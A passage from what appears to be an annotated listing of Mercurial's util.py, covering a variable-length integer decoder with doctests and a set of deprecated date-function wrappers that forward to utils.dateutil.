4003 4236 bytes.append(pycompat.bytechr(0x80 | bits))
4004 4237 bits = value & 0x7f
4005 4238 value >>= 7
4006 4239 bytes.append(pycompat.bytechr(bits))
4007 4240
4008 4241 return ''.join(bytes)
4009 4242
4010 4243 def uvarintdecodestream(fh):
4011 4244 """Decode an unsigned variable length integer from a stream.
4012 4245
4013 4246 The passed argument is anything that has a ``.read(N)`` method.
4014 4247
4015 4248 >>> try:
4016 4249 ... from StringIO import StringIO as BytesIO
4017 4250 ... except ImportError:
4018 4251 ... from io import BytesIO
4019 4252 >>> uvarintdecodestream(BytesIO(b'\\x00'))
4020 4253 0
4021 4254 >>> uvarintdecodestream(BytesIO(b'\\x01'))
4022 4255 1
4023 4256 >>> uvarintdecodestream(BytesIO(b'\\x7f'))
4024 4257 127
4025 4258 >>> uvarintdecodestream(BytesIO(b'\\xb9\\n'))
4026 4259 1337
4027 4260 >>> uvarintdecodestream(BytesIO(b'\\x80\\x80\\x04'))
4028 4261 65536
4029 4262 >>> uvarintdecodestream(BytesIO(b'\\x80'))
4030 4263 Traceback (most recent call last):
4031 4264 ...
4032 4265 Abort: stream ended unexpectedly (got 0 bytes, expected 1)
4033 4266 """
4034 4267 result = 0
4035 4268 shift = 0
4036 4269 while True:
4037 4270 byte = ord(readexactly(fh, 1))
4038 4271 result |= ((byte & 0x7f) << shift)
4039 4272 if not (byte & 0x80):
4040 4273 return result
4041 4274 shift += 7
4042 4275
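# A usage sketch: the encoder and decoder round-trip through any file-like
# object with a read() method.
#
#   >>> from io import BytesIO
#   >>> uvarintdecodestream(BytesIO(uvarintencode(1337)))
#   1337
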
4043 4276 ###
4044 4277 # Deprecation warnings for util.py splitting
4045 4278 ###
4046 4279
4047 4280 defaultdateformats = dateutil.defaultdateformats
4048 4281
4049 4282 extendeddateformats = dateutil.extendeddateformats
4050 4283
4051 4284 def makedate(*args, **kwargs):
4052 4285 msg = ("'util.makedate' is deprecated, "
4053 4286 "use 'utils.dateutil.makedate'")
4054 4287 nouideprecwarn(msg, "4.6")
4055 4288 return dateutil.makedate(*args, **kwargs)
4056 4289
4057 4290 def datestr(*args, **kwargs):
4058 4291 msg = ("'util.datestr' is deprecated, "
4059 4292 "use 'utils.dateutil.datestr'")
4060 4293 nouideprecwarn(msg, "4.6")
4061 4294 return dateutil.datestr(*args, **kwargs)
4062 4295
4063 4296 def shortdate(*args, **kwargs):
4064 4297 msg = ("'util.shortdate' is deprecated, "
4065 4298 "use 'utils.dateutil.shortdate'")
4066 4299 nouideprecwarn(msg, "4.6")
4067 4300 return dateutil.shortdate(*args, **kwargs)
4068 4301
4069 4302 def parsetimezone(*args, **kwargs):
4070 4303 msg = ("'util.parsetimezone' is deprecated, "
4071 4304 "use 'utils.dateutil.parsetimezone'")
4072 4305 nouideprecwarn(msg, "4.6")
4073 4306 return dateutil.parsetimezone(*args, **kwargs)
4074 4307
4075 4308 def strdate(*args, **kwargs):
4076 4309 msg = ("'util.strdate' is deprecated, "
4077 4310 "use 'utils.dateutil.strdate'")
4078 4311 nouideprecwarn(msg, "4.6")
4079 4312 return dateutil.strdate(*args, **kwargs)
4080 4313
4081 4314 def parsedate(*args, **kwargs):
4082 4315 msg = ("'util.parsedate' is deprecated, "
4083 4316 "use 'utils.dateutil.parsedate'")
4084 4317 nouideprecwarn(msg, "4.6")
4085 4318 return dateutil.parsedate(*args, **kwargs)
4086 4319
4087 4320 def matchdate(*args, **kwargs):
4088 4321 msg = ("'util.matchdate' is deprecated, "
4089 4322 "use 'utils.dateutil.matchdate'")
4090 4323 nouideprecwarn(msg, "4.6")
4091 4324 return dateutil.matchdate(*args, **kwargs)